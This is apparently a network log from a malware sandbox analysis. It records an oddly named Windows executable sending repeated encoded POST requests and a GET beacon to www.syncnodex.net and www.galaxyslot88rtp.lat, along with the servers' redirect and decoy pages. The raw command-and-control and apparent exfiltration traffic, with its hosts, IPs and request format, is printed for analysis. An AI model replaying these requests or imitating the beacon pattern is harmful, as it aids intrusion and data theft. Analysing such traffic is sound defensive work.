                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:08.814115047 CEST | 1236 | IN | Data Raw: 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c
                                                                Data Ascii: el="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -->
                                                                Sep 22, 2024 17:42:08.814127922 CEST | 448 | IN | Data Raw: 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: </div> <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span
                                                                Sep 22, 2024 17:42:08.814208031 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a hr
                                                                Sep 22, 2024 17:42:08.814219952 CEST | 1236 | IN | Data Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68
                                                                Data Ascii: </div> </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Property
                                                                Sep 22, 2024 17:42:08.814232111 CEST | 1236 | IN | Data Raw: 66 6c 75 69 64 22 20 73 72 63 3d 22 69 6d 67 2f 68 65 61 64 65 72 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20
                                                                Data Ascii: fluid" src="img/header.jpg" alt=""> </div> </div> </div> ... Header End --> ... Search Start --> <div class="container-fluid bg-primary mb-5 wow fadeIn" data-wow-delay="0.
                                                                Sep 22, 2024 17:42:08.814244986 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 6c 65 63 74 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 73 65 6c 65 63 74 20 62 6f 72 64 65 72 2d 30 20 70 79 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <select class="form-select border-0 py-3"> <option selected>Location</option> <option value="1">Location 1</option>
                                                                Sep 22, 2024 17:42:08.814383030 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 57 65 e2 80 99 72 65 20 73 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 68 61 76 65 20 6c 6f 6f 6b 65 64 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 69 6e
                                                                Data Ascii: <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try to use a search?</p> <a class="btn btn-primary py-3 px-5" href="">Go Back To Home</a>
                                                                Sep 22, 2024 17:42:08.814395905 CEST | 1236 | IN | Data Raw: 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c 22 20 68 72 65 66 3d 22 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: ine-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></a> <a class="btn btn-outline-ligh
                                                                Sep 22, 2024 17:42:08.814409018 CEST | 1236 | IN | Data Raw: 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-2.jpg"
                                                                Sep 22, 2024 17:42:08.819174051 CEST | 1236 | IN | Data Raw: 73 6c 65 74 74 65 72 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 44 6f 6c 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73
                                                                Data Ascii: sletter</h5> <p>Dolor amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-cont


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                17 | 192.168.2.6 | 49739 | 15.197.172.60 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:14.229240894 CEST | 686 | OUT | POST /xx1z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.syncnodex.net
                                                                Origin: http://www.syncnodex.net
                                                                Referer: http://www.syncnodex.net/xx1z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 51 2b 4e 7a 45 55 50 51 58 4c 2f 6c 47 31 54 4e 6a 35 66 51 68 65 7a 45 6e 38 54 35 2b 73 30 7a 50 4e 6a 71 4a 34 49 48 43 61 31 68 31 49 49 59 49 63 36 6b 49 38 48 35 70 6c 37 6b 45 35 75 2f 62 45 41 79 4c 74 36 64 65 41 47 33 30 48 39 76 72 67 70 42 7a 34 31 55 4c 37 46 71 72 77 65 4b 35 34 4d 32 58 47 66 5a 34 6e 78 4b 42 49 48 72 76 6f 6f 6b 56 63 54 79 75 64 4f 6b 63 64 57 6a 64 4d 70 33 6c 43 32 55 75 4e 73 46 7a 44 4c 51 4b 53 6e 2f 2b 44 34 44 77 72 63 4d 57 30 77 4f 6c 7a 43 75 6b 48 58 42 7a 7a 42 69 54 63 53 61 76 58 30 7a 6e 73 66 53 2b 50 66 4a 62 4f 54 2f
                                                                Data Ascii: i4fTbV=YSeb04MEpdQKQ+NzEUPQXL/lG1TNj5fQhezEn8T5+s0zPNjqJ4IHCa1h1IIYIc6kI8H5pl7kE5u/bEAyLt6deAG30H9vrgpBz41UL7FqrweK54M2XGfZ4nxKBIHrvookVcTyudOkcdWjdMp3lC2UuNsFzDLQKSn/+D4DwrcMW0wOlzCukHXBzzBiTcSavX0znsfS+PfJbOT/


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                18 | 192.168.2.6 | 49740 | 15.197.172.60 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:16.850892067 CEST | 710 | OUT | POST /xx1z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.syncnodex.net
                                                                Origin: http://www.syncnodex.net
                                                                Referer: http://www.syncnodex.net/xx1z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 57 65 39 7a 43 7a 6a 51 57 72 2f 6d 61 6c 54 4e 71 5a 66 55 68 65 2f 45 6e 2f 66 70 2b 66 51 7a 42 50 37 71 49 36 67 48 42 61 31 68 36 6f 49 58 4d 63 36 2f 49 38 4b 45 70 6b 58 6b 45 35 36 2f 62 42 38 79 4c 61 75 65 65 51 47 31 79 48 39 74 76 67 70 42 7a 34 31 55 4c 37 42 55 72 77 47 4b 35 49 63 32 57 6e 66 47 32 48 78 46 47 49 48 72 72 6f 6f 67 56 63 54 51 75 59 6d 65 63 66 2b 6a 64 4e 5a 33 6b 58 61 54 6e 4e 73 44 39 6a 4b 54 47 48 53 75 78 6a 31 37 2f 72 55 71 4c 57 67 6b 67 46 44 30 34 30 58 69 68 6a 68 67 54 65 4b 6f 76 33 30 5a 6c 73 6e 53 73 59 54 75 55 36 32 63 72 38 42 68 2b 31 53 6d 6b 66 65 66 4e 2f 7a 75 70 53 6d 57 53 77 3d 3d
                                                                Data Ascii: i4fTbV=YSeb04MEpdQKWe9zCzjQWr/malTNqZfUhe/En/fp+fQzBP7qI6gHBa1h6oIXMc6/I8KEpkXkE56/bB8yLaueeQG1yH9tvgpBz41UL7BUrwGK5Ic2WnfG2HxFGIHrroogVcTQuYmecf+jdNZ3kXaTnNsD9jKTGHSuxj17/rUqLWgkgFD040XihjhgTeKov30ZlsnSsYTuU62cr8Bh+1SmkfefN/zupSmWSw==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                19 | 192.168.2.6 | 49741 | 15.197.172.60 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:19.437231064 CEST | 1723 | OUT | POST /xx1z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.syncnodex.net
                                                                Origin: http://www.syncnodex.net
                                                                Referer: http://www.syncnodex.net/xx1z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 57 65 39 7a 43 7a 6a 51 57 72 2f 6d 61 6c 54 4e 71 5a 66 55 68 65 2f 45 6e 2f 66 70 2b 66 59 7a 42 2b 62 71 4a 62 67 48 41 61 31 68 6b 34 49 55 4d 63 37 39 49 38 53 41 70 6b 72 30 45 37 43 2f 61 6a 45 79 4a 75 43 65 52 51 47 31 77 48 39 73 72 67 6f 42 7a 34 6b 66 4c 37 78 55 72 77 47 4b 35 4f 51 32 52 32 66 47 30 48 78 4b 42 49 47 35 76 6f 6f 59 56 63 62 71 75 59 71 4f 63 75 65 6a 64 74 4a 33 6a 6c 69 54 73 4e 73 42 77 44 4b 78 47 48 58 32 78 6a 70 42 2f 6f 49 55 4c 57 45 6b 6b 51 6d 76 67 6e 6e 50 33 51 4e 73 44 74 69 34 6d 67 42 73 6c 64 54 65 73 65 48 35 4c 65 7a 77 73 70 6b 38 38 57 54 6c 76 76 57 50 56 6f 4b 6e 39 53 2b 66 47 77 78 36 66 65 70 42 2b 54 59 71 65 77 35 58 75 76 31 74 69 61 4c 6d 6a 51 31 37 61 61 71 30 43 6f 45 4f 6e 72 51 44 6f 4d 70 2b 58 62 75 2b 32 6d 65 45 78 65 74 43 50 62 68 43 75 76 62 67 5a 56 67 76 78 78 56 6c 52 47 34 49 35 58 74 74 77 4d 4e 75 45 68 38 52 51 6a 53 4d 78 4d 68 4e 64 77 66 47 57 51 42 67 6c 30 76 [TRUNCATED]
                                                                Data Ascii: i4fTbV=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 [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                20 | 192.168.2.6 | 49742 | 15.197.172.60 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:21.986989021 CEST | 421 | OUT | GET /xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.syncnodex.net
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:22.448048115 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:42:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 34 66 54 62 56 3d 56 51 32 37 33 50 6f 72 39 74 5a 4e 58 63 70 6e 42 6a 48 79 65 72 48 66 50 68 33 49 75 59 33 53 38 65 4c 32 32 2f 66 75 73 6f 35 64 42 64 50 59 4d 6f 45 57 47 65 64 36 2b 62 46 78 4f 35 43 39 4c 59 53 2f 70 79 76 75 56 4b 57 4b 55 52 51 36 5a 61 71 49 62 67 4c 44 33 46 64 4f 71 54 68 66 69 70 4a 53 4d 70 6f 70 38 58 54 37 33 74 67 4f 4a 58 2f 65 76 6c 42 66 5a 4a 71 70 73 75 63 6a 61 74 6e 48 33 49 63 3d 26 61 7a 71 3d 66 64 4b 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL"}</script></head></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                21 | 192.168.2.6 | 49744 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:28.018125057 CEST | 704 | OUT | POST /lbpf/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.galaxyslot88rtp.lat
                                                                Origin: http://www.galaxyslot88rtp.lat
                                                                Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 48 5a 46 58 79 33 74 42 77 6d 48 59 57 4f 30 62 68 62 67 2b 63 6e 54 6b 44 46 31 55 75 6a 43 46 76 66 67 71 73 78 2f 6d 63 59 73 57 59 2b 43 34 39 57 52 65 38 6e 43 71 4d 61 47 72 39 65 7a 79 53 62 42 6c 57 31 4b 78 37 2f 57 41 59 73 4c 37 5a 31 68 66 78 58 71 51 4c 65 50 47 50 34 76 2f 68 30 45 43 6a 47 74 2f 50 54 43 36 4c 77 4e 59 67 44 57 6b 4e 6c 77 4b 79 78 53 52 53 6d 68 54 46 36 39 76 45 77 4b 49 4f 53 45 4d 61 69 46 6a 5a 55 4c 46 7a 53 62 2f 53 67 4d 6f 30 6b 72 67 70 52 72 53 53 58 62 54 63 56 42 41 35 69 75 45 4e 6c 6e 66 67 37 4d 6c 4d 67 4f 74 43 68 56 62
                                                                Data Ascii: i4fTbV=B8r/v0PfZmCZHZFXy3tBwmHYWO0bhbg+cnTkDF1UujCFvfgqsx/mcYsWY+C49WRe8nCqMaGr9ezySbBlW1Kx7/WAYsL7Z1hfxXqQLePGP4v/h0ECjGt/PTC6LwNYgDWkNlwKyxSRSmhTF69vEwKIOSEMaiFjZULFzSb/SgMo0krgpRrSSXbTcVBA5iuENlnfg7MlMgOtChVb


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                22 | 192.168.2.6 | 49745 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:30.580266953 CEST | 728 | OUT | POST /lbpf/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.galaxyslot88rtp.lat
                                                                Origin: http://www.galaxyslot88rtp.lat
                                                                Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 46 35 31 58 2b 30 46 42 32 47 48 66 61 75 30 62 6f 37 67 36 63 6e 58 6b 44 45 68 45 75 51 6d 46 6f 39 34 71 74 77 2f 6d 62 59 73 57 57 65 43 78 77 32 52 56 38 6e 4f 59 4d 65 47 72 39 65 6e 79 53 61 78 6c 56 47 53 32 37 76 57 43 42 38 4c 35 57 56 68 66 78 58 71 51 4c 65 79 52 50 34 6e 2f 68 67 34 43 73 48 74 38 54 6a 43 35 62 67 4e 59 32 7a 57 34 4e 6c 78 6e 79 30 79 33 53 6b 70 54 46 34 6c 76 45 6c 71 4c 48 53 45 4b 48 53 45 69 5a 31 53 55 2b 67 6d 6f 4d 51 55 35 68 45 6d 46 68 48 71 49 4f 6b 62 77 4f 46 68 43 35 67 32 32 4e 46 6e 31 69 37 30 6c 65 33 43 4b 4e 56 77 34 63 33 6e 39 61 73 49 62 4f 39 39 57 70 58 71 51 42 39 58 4f 69 41 3d 3d
                                                                Data Ascii: i4fTbV=B8r/v0PfZmCZF51X+0FB2GHfau0bo7g6cnXkDEhEuQmFo94qtw/mbYsWWeCxw2RV8nOYMeGr9enySaxlVGS27vWCB8L5WVhfxXqQLeyRP4n/hg4CsHt8TjC5bgNY2zW4Nlxny0y3SkpTF4lvElqLHSEKHSEiZ1SU+gmoMQU5hEmFhHqIOkbwOFhC5g22NFn1i70le3CKNVw4c3n9asIbO99WpXqQB9XOiA==
                                                                Sep 22, 2024 17:42:31.547988892 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sun, 22 Sep 2024 15:42:31 GMT
                                                                server: LiteSpeed
                                                                platform: hostinger
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-xss-protection: 1; mode=block
                                                                x-content-type-options: nosniff
                                                                vary: User-Agent
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                Sep 22, 2024 17:42:31.548017979 CEST | 431 | IN | Data Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                23 | 192.168.2.6 | 49746 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:33.132479906 CEST | 1741 | OUT | POST /lbpf/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.galaxyslot88rtp.lat
                                                                Origin: http://www.galaxyslot88rtp.lat
                                                                Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
